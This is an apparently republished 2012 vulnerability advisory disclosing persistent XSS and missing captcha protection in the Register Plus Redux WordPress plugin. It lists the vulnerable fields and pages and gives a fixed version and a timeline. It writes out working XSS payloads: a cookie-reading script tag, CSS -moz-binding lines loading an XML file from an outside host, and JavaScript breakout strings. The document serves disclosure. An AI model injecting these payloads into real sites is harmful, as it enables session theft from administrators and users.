Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27546
HistoryJan 09, 2012 - 12:00 a.m.

XSS and IAA vulnerabilities in Register Plus Redux for WordPress

2012-01-0900:00:00
vulners.com
14
JSON

Hello 3APA3A!

I want to warn you about multiple new vulnerabilities in plugin Register Plus Redux for WordPress. Last version of the plugin was checked. This is second advisory concerning new vulnerabilities in Register Plus Redux.

These are Cross-Site Scripting and Insufficient Anti-automation vulnerabilities.

Affected products:

Vulnerable are Register Plus Redux v3.7.3.1 and previous versions.

By request of my client I've made new version of the plugin with fixing of all vulnerabilities, which I found. I named this version as Register Plus Redux 3.8 (to distinguish between it and original version of the plugin). So all users of this plugin can find new and secure version of the plugin in Internet.

Details:

Persistent XSS (WASC-08):

There are the next vulnerabilities at page http://site/wp-admin/options-general.php?page=register-plus-redux.

In fields: Email Verification, Admin Verification, User Message (if set Custom New User Message), User Message (if set Custom Verification Message), Admin Message (if set Custom Admin Notification), Custom Register CSS, Custom Login CSS:
</textarea><script>alert(document.cookie)</script>

The code will work at page http://site/wp-admin/options-general.php?page=register-plus-redux, and in case of fields Email Verification and Admin Verification also will work at page http://site/wp-login.php?checkemail=registered.

If to set the code in fields Custom Register CSS, Custom Login CSS:
body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss&#41;}

The code will work accordingly at pages http://site/wp-login.php?action=register and http://site/wp-login.php. The code will work in Firefox < 3.0, but if to place xml-file at the same site (via uploader), then it'll be possible to attack also Firefox 3.0 and higher. And if to set the code with using of expression, javascript or vbscript in styles, then it'll execute in IE.

If to set the code in field Minimum password length (in User Set Password) at set options Require new users enter a password during registration and Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1

The code will work at page http://site/wp-login.php?action=register.

If to set the code in fields Empty, Short, Bad, Good, Strong, Mismatch (in User Set Password) at set options Require new users enter a password during registration and Show password strength meter:
"};alert(document.cookie);/*

The code will work at page http://site/wp-login.php?action=register.

If to set the code in field Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss&#41;

The code will work at page http://site/wp-login.php?action=register. The code will work in Firefox < 3.0, but if to place xml-file at the same site (via uploader), then it'll be possible to attack also Firefox 3.0 and higher. And if to set the code with using of expression, javascript or vbscript in styles, then it'll execute in IE.

Strictly Social XSS persistent (WASC-08):

In above-mentioned fields User Message (if set Custom New User Message), User Message (if set Custom Verification Message), Admin Message (if set Custom Admin Notification) besides XSS in field itself, there is also XSS via visualization (which is going via jQuery), and so at sending of POST request the code will execute twice, and it's needed to fix every of these vulnerabilities in two places (because even escaped code will execute). Besides an attack via sending POST request, it's possible to conduct XSS attack via visualization in these three fields, and also in nine other fields (From Email, From Name, Subject in Custom New User Message, in Custom Verification Message and in Custom Admin Notification) at pasting of XSS code in the field.

I.e. it's needed fraudulently to force a victim to paste code in any of these 12 fields, at that the code can be put in clipboard of a victim via attack via clipboard (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html&#41;. These vulnerabilities - it's Strictly social XSS (http://websecurity.com.ua/5476/&#41;.

Insufficient Anti-automation (WASC-21):

http://site/wp-login.php?action=register

In registration form there is no protection against automated requests (captcha). As in previous versions of the plugin.

Timeline:

2011.11.25 - found vulnerabilities.
2011.11.30 - fixed vulnerabilities.
2011.11.30 - Informed developer.
2011.11.30 - released Register Plus Redux 3.8 (with fixed all vulnerabilities of version 3.7.3.1).
2011.12.01 - announced at my site.
2011.12.05 - released Register Plus Redux 3.8.1 (with new features).
2011.12.31 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5536/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON